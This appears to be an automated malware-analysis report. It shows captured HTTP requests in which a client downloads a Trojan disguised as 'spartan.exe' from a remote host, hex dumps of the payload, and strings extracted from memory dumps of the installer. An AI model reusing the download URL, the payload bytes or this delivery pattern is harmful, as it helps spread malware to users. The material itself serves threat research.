X-Powered-By: PHP/5.5.9-1ubuntu4.11
Content-Length: 0
Content-Type: text/html
HTTP/1.1 200 OK..Date: Mon, 17 Aug 2015 14:02:35 GMT..Server: Apache/2.4.7 (Ubuntu)..Content-Location: seperator.php..Vary: negotiate..TCN: choice..X-Powered-By: PHP/5.5.9-1ubuntu4.11..Content-Length: 0..Content-Type: text/html......
GET /img/seperator?id=12002&action=2&run=2 HTTP/1.1
Host: CgD7cAK.rlkwg.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2015 14:02:37 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: seperator.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Content-Description: File Transfer
Content-Disposition: attachment; filename="spartan.exe"
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 5930696
Content-Type: application/octet-stream
1d1bd66a7075644656775350beb96a73cd64465277535041066a737564465277535041466a737564465277535041466a737564465277535041466a73a5644652794cea4f46de7ab845fe533b9e71152e03005514343d1021312c6609121b0a292657313561341f1d550d2872331c03612b0517104a4b5f7d775041466a7375647afa8bab2888d4c10bbcf6ed2abec1fbfa80a7d80fadd4f90f9ac3eaa5a3e1dedf809ddc3a99d3ed4699d7cf329be5f8ef8ed2c10abcf6ed001e3038398ff8d87564465277535041466a7375644652770315414626727064fdb16d185041466a73756446b2775c514a476c737538465277ef6941466e73755b745277534041466a037564465237535051466a737764465677535047466a737164465277535041466a48756442527753504146687375e4465267535051466a737574465267535041466a736564465277535041466a7375c0355277e75041466a834f648e5977535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564365277df5241466a737564465277535041466a737564465277535041466a735b10232a03535041e031737564565277530c41466a777564465277535041466a73756446727753306f340e1201054652e7425041461a737564545277533041466a737564465277535041466a337564067c13322420466a73adf37f5277c35041466e737564345277535041466a73756446527753104146aa5d1b00272616535041866a7375547c5277535041466a737564465277535041466a737564c65277937e333518107564469a7c535041b650737568465277255041466a737564465277535041462a737524465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a7375644652
<<< skipped >>>
GET /img/seperator?id=12002&action=2&run=3 HTTP/1.1
Host: CgD7cAK.rlkwg.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2015 14:02:45 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: seperator.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Content-Description: File Transfer
Content-Disposition: attachment; filename="spartan.exe"
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 1148928
Content-Type: application/octet-stream
1d1bd66a7075644656775350beb96a73cd64465277535041066a737564465277535041466a737564465277535041466a737564465277535041466a73f5644652794cea4f46de7ab845fe533b9e71152e03005514343d1021312c6609121b0a292657313561341f1d550d2872331c03612b0517104a4b5f7d775041466a737564161777531c40416a737564465277535041466a73956448517c525201163f7175c8735477377941464a167764464277535031446a737524465267535041446a737164465276535041426a737564465277536048466a777564465277535241466a737564475267535041467a737574465277535041566a737564465277535041466a837d642252775350414f6a037664465277535041466a737564465277535041467a7a7570595277535041466a737564465277535041466a737564465277535041466a737564465277535041466a7375644652775350414642817d64825377535041466a737564465277535041466a737564465277535041681e160d10465277030543466a637564460475535045466a737564465277535041466a735564463259373135276a7375c8735477532043466a457364460875535041466a737564465277535001466ab35b063521775350412243737564f65a77535041466a737564465277535041466a73756446d27753906f0538277564465273535041468a7b756444527753c049466a737564465277535041466a737564447c1e373135276a730968465277a358414664737564d45a77535041466a73756446527753104146aa5d0717343177535031456a7375644f527757504146ca7b7564465277535041466a737564065277937e3323061c16644646685350415663737544465277f75841466a737564465277535041466a737566465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a737564465277535041466a7375644652
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_220:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
msvcrt.dll
msvcrt.dll
COMCTL32.dll
COMCTL32.dll
VERSION.dll
VERSION.dll
advapi32.dll
advapi32.dll
wininit.ini
wininit.ini
advpack.dll
advpack.dll
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupapi.dll
setupx.dll
setupx.dll
IXPd.TMP
IXPd.TMP
TMP4351$.TMP
TMP4351$.TMP
FINISHMSG
FINISHMSG
USRQCMD
USRQCMD
ADMQCMD
ADMQCMD
msdownld.tmp
msdownld.tmp
wextract.pdb
wextract.pdb
PSSSSSSh
PSSSSSSh
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegCreateKeyExA
RegCreateKeyExA
GetWindowsDirectoryA
GetWindowsDirectoryA
ExitWindowsEx
ExitWindowsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
_acmdln
_acmdln
_amsg_exit
_amsg_exit
rundll32.exe %s,InstallHinfSection %s 128 %s
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
wextract_cleanup%d
%s /D:%s
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
Command.com /c %s
zcÃ
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
Autoplay.exe
Autoplay.exe
setup.exe
setup.exe
.RP4R?
.RP4R?
Dn.vx
Dn.vx
.guQgI\m
.guQgI\m
.cXFv:
.cXFv:
QX/].dA
QX/].dA
?1H.Wx
?1H.Wx
nS!%F}
nS!%F}
.MOf;s
.MOf;s
|.tA7
|.tA7
>=.XI
>=.XI
'Iq%D
'Iq%D
A.cU#
A.cU#
%SrFA
%SrFA
j(UU1%cg
j(UU1%cg
A,~h%d
A,~h%d
Lq.WW
Lq.WW
={9%u
={9%u
.xGzir*&
.xGzir*&
PQ.IV=B
PQ.IV=B
bftP
bftP
v~.zwDF
v~.zwDF
LjS.nz2E
LjS.nz2E
As.IE
As.IE
.UQ0yS
.UQ0yS
1.kdS
1.kdS
.Gi?7
.Gi?7
k.fx,
k.fx,
[.fouD
[.fouD
G:.VR
G:.VR
.DL7 ^m
.DL7 ^m
:qw%d
:qw%d
, nP%C,
, nP%C,
?!-2}
?!-2}
%DoB'}yA
%DoB'}yA
.fsno@
.fsno@
L%crR)
L%crR)
[-k%S
[-k%S
..Ei[
..Ei[
.BxhM
.BxhM
*.qU=
*.qU=
P*<.xw>
P*<.xw>
o%X?}y
o%X?}y
^~.aQ
^~.aQ
\k.cD
\k.cD
.St'}/
.St'}/
#XU1.%X
#XU1.%X
^:'d.YNNB
^:'d.YNNB
c6@v%cN-
c6@v%cN-
#%uB2
#%uB2
oP&;&%d
oP&;&%d
dM.KV
dM.KV
.aY!9
.aY!9
S@%S-
S@%S-
_k[9cRT
_k[9cRT
rxy%uf7Gh
rxy%uf7Gh
Yy.vn2
Yy.vn2
Sy5.Nc
Sy5.Nc
^.IMG
^.IMG
p>gT%s
p>gT%s
PWx.nk
PWx.nk
S=.Bf
S=.Bf
e.IVx
e.IVx
to.IH
to.IH
].Qbq
].Qbq
.Lll,.4
.Lll,.4
_% X.GW
_% X.GW
7I.tj
7I.tj
@%dp{K
@%dp{K
#u.KT-
#u.KT-
9cmdV#''
9cmdV#''
%cRGbU
%cRGbU
pb.GFA
pb.GFA
.zw:t
.zw:t
.ZmEo
.ZmEo
QEXe`
QEXe`
l%up
l%up
>.zIc
>.zIc
2^.ddC
2^.ddC
H
H
RC~.je
RC~.je
@.|"8=)?
@.|"8=)?
i.AAA
i.AAA
%d
%d
U.tH4
U.tH4
B1].dor
B1].dor
h%d/%
h%d/%
3^)%Ç
3^)%Ç
GC%Du
GC%Du
SCRT
SCRT
%u$ad
%u$ad
6.OUg,
6.OUg,
,&.vl
,&.vl
P}.TYk
P}.TYk
%x66Z@
%x66Z@
U.eCi
U.eCi
%d`["
%d`["
].ZPA
].ZPA
S5.bT
S5.bT
.IbX.
.IbX.
ZZ~k$%U
ZZ~k$%U
g.gD}O
g.gD}O
.OnCUe
.OnCUe
W.apz
W.apz
)7.Vv
)7.Vv
)&&/{&7>
)&&/{&7>
,.Ae8
,.Ae8
C:\o9
C:\o9
%cRSL
%cRSL
%9uk2
%9uk2
i%uZ!L
i%uZ!L
'#.wmU
'#.wmU
%Sa##K
%Sa##K
.HP *
.HP *
ixD&J.bW
ixD&J.bW
4x).zE
4x).zE
DXW.EA2
DXW.EA2
8.Fc-P
8.Fc-P
.ww.y
.ww.y
.OT?W
.OT?W
.tiFu
.tiFu
m.kg7
m.kg7
|.svq
|.svq
-.PGP
-.PGP
.FMpg
.FMpg
c%c;Z
c%c;Z
%X1=WP
%X1=WP
d-KRB.JF
d-KRB.JF
-AG%s
-AG%s
O.%u
O.%u
Mi%U$
Mi%U$
.lfBZ
.lfBZ
%2U;0
%2U;0
KsX%cv
KsX%cv
n.qv0*
n.qv0*
a.VZw
a.VZw
F4Ô1
F4Ô1
%DS&%
%DS&%
qI.HHGX
qI.HHGX
_ÂGE
_ÂGE
|KsSh
|KsSh
?H.Cl
?H.Cl
;O.GH`6v%
;O.GH`6v%
w|.Dw
w|.Dw
.T %s
.T %s
.oC:Z
.oC:Z
9\N.Ao
9\N.Ao
s%C)G
s%C)G
|%F!u
|%F!u
S.mfQ
S.mfQ
WF..bb
WF..bb
fTPj)f1 %
fTPj)f1 %
.zs"\"
.zs"\"
qa%%C
qa%%C
.iN&v
.iN&v
H.uJO
H.uJO
jË~
jË~
EZ.DO
EZ.DO
.Ye5}xU
.Ye5}xU
r.bO3
r.bO3
%U=p0*
%U=p0*
.Zxy9
.Zxy9
m?.lh
m?.lh
II.iE5
II.iE5
o.LKn%g
o.LKn%g
.Cbkn
.Cbkn
D.JNn
D.JNn
RÃI
RÃI
N.w%c
N.w%c
c%F;Z
c%F;Z
A"%4S
A"%4S
Jw.Um/}
Jw.Um/}
.HH z
.HH z
%CXf)6
%CXf)6
K0C.Kjs
K0C.Kjs
ncb.KLP
ncb.KLP
%u
%u
r.mx$
r.mx$
wn.rN
wn.rN
ZJ>.gT
ZJ>.gT
F$U-2azS9G8}n
F$U-2azS9G8}n
X&.ha
X&.ha
)b<.hj>
)b<.hj>
,|}.rS
,|}.rS
TCPc
TCPc
O.yd
O.yd
qMF.cV
qMF.cV
!aD.me
!aD.me
.lz{f
.lz{f
G%x
G%x
9.XF1
9.XF1
$z.KU
$z.KU
%fK]P
%fK]P
Qj%xX
Qj%xX
]O.YYu!
]O.YYu!
.LS0ZU
.LS0ZU
A.WHf
A.WHf
.LyW1
.LyW1
{}m %x
{}m %x
h.blu
h.blu
'..gFP
'..gFP
weB :
weB :
7.tj3l
7.tj3l
iU%C(2
iU%C(2
]0y#.HR
]0y#.HR
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Setup Data (5.5.0) (u)
.dEO%s
.dEO%s
nA.wCv$
nA.wCv$
[^'%d=
[^'%d=
ib%xA
ib%xA
.Zf4
.Zf4
fT.iv
fT.iv
d-A}E
d-A}E
t%.Re7
t%.Re7
K.TUM
K.TUM
!o%FM
!o%FM
me.lc
me.lc
.aN=q
.aN=q
.ul#v
.ul#v
C .eV
C .eV
9D.Bb
9D.Bb
g.DlGWO
g.DlGWO
.KZF0
.KZF0
-.Wj5
-.Wj5
-d}Y=
-d}Y=
D.usx
D.usx
.Yt!^q
.Yt!^q
d%8su
d%8su
Z].dq
Z].dq
-&.vQ
-&.vQ
K%s9y
K%s9y
kZ-s}
kZ-s}
O%S\{
O%S\{
.gj"[`D
.gj"[`D
.OV7Ru
.OV7Ru
uP.di/y
uP.di/y
wextract.manifest
wextract.manifest
Manifest to support IExpress WExtract.exe.
Manifest to support IExpress WExtract.exe.
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
Kernel32.dll
Kernel32.dll
Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
CFailed to get disk space information from: %s.
CFailed to get disk space information from: %s.
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
8Unable to retrieve operating system version information.!Memory allocation request failed.
8Unable to retrieve operating system version information.!Memory allocation request failed.
Filetable full.Ên not change to destination folder.
Filetable full.Ên not change to destination folder.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
(Error creating process . Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
(Error creating process . Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Could not create folder '%s'
Could not create folder '%s'
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
Error retrieving Windows folder
Error retrieving Windows folder
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
/C: -- Override Install Command defined by author.
/C: -- Override Install Command defined by author.
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
Could not find the file: %s.
Could not find the file: %s.
:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.
:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.
setup.exe_1408:
.text
.text
`.itext
`.itext
`.data
`.data
.idata
.idata
.rdata
.rdata
@.rsrc
@.rsrc
ENoMonitorSupportException
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
EVariantBadIndexError
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
kernel32.dll
kernel32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
comctl32.dll
comctl32.dll
KWindows
KWindows
UrlMon
UrlMon
6MsgIDs
6MsgIDs
Msgs
Msgs
name="JR.Inno.Setup"
name="JR.Inno.Setup"
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
File I/O error %d
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
lzmadecompsmall: %s
LzmaDecode failed (%d)
LzmaDecode failed (%d)
shell32.dll
shell32.dll
/SL5="$%x,%d,%d,
/SL5="$%x,%d,%d,
Invalid file name - %s
Invalid file name - %s
Wed(Monitor support function not initialized
Wed(Monitor support function not initialized
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
setup.tmp_632:
.text
.text
`.itext
`.itext
`.data
`.data
.idata
.idata
.rdata
.rdata
@.rsrc
@.rsrc
Windows
Windows
ENoMonitorSupportException
ENoMonitorSupportException
.uvCOu
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.OA
Uh.OA
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
EInvalidGraphicOperation
EInvalidGraphicOperation
TPent%C
TPent%C
PasswordChar
PasswordChar
OnKeyDown
OnKeyDown
OnKeyPressLkR
OnKeyPressLkR
OnKeyUp
OnKeyUp
ssHorizontal
ssHorizontal
TCustomButton.TButtonStyle
TCustomButton.TButtonStyle
msShiftSelect
msShiftSelect
ArrowKeys
ArrowKeys
THKInvalidKey
THKInvalidKey
THKInvalidKeys
THKInvalidKeys
TCustomHotKey
TCustomHotKey
THotKeyh
THotKeyh
THotKey
THotKey
HotKey
HotKey
InvalidKeys
InvalidKeys
vsReport
vsReport
Uh3%F
Uh3%F
TComboBoxExEnumerator
TComboBoxExEnumerator
EXPORT
EXPORT
TPSExec
TPSExec
TPSRuntimeClassImporterP;U
TPSRuntimeClassImporterP;U
TPSExportedVar
TPSExportedVar
TPSCustomDebugExec
TPSCustomDebugExec
TPSDebugExec
TPSDebugExec
Monochrome
Monochrome
SHORTCUTTOKEY
SHORTCUTTOKEY
AUTOHOTKEYS
AUTOHOTKEYS
RETHINKHOTKEYS
RETHINKHOTKEYS
OnKeyPress
OnKeyPress
t.Htb
t.Htb
1.2.1
1.2.1
TPasswordEdit
TPasswordEdit
TPasswordEditHWL
TPasswordEditHWL
PasswordEdit*
PasswordEdit*
Password
Password
PasswordPage
PasswordPage
PasswordLabel
PasswordLabel
PasswordEdit
PasswordEdit
PasswordEditLabel
PasswordEditLabel
GetPassword
GetPassword
CheckPassword
CheckPassword
IMsg
IMsg
FormKeyDown
FormKeyDown
PasswordCheckHash
PasswordCheckHash
TKeyNameConst
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
TOutputMsgMemoWizardPage
MsgLabel
MsgLabel
Msg1Label
Msg1Label
Msg2Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
procedure SetPassword(const Password: String);
procedure SetPassword(const Password: String);
function CheckForMutexes(Mutexes: String): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function CustomMessage(const MsgName: String): String;
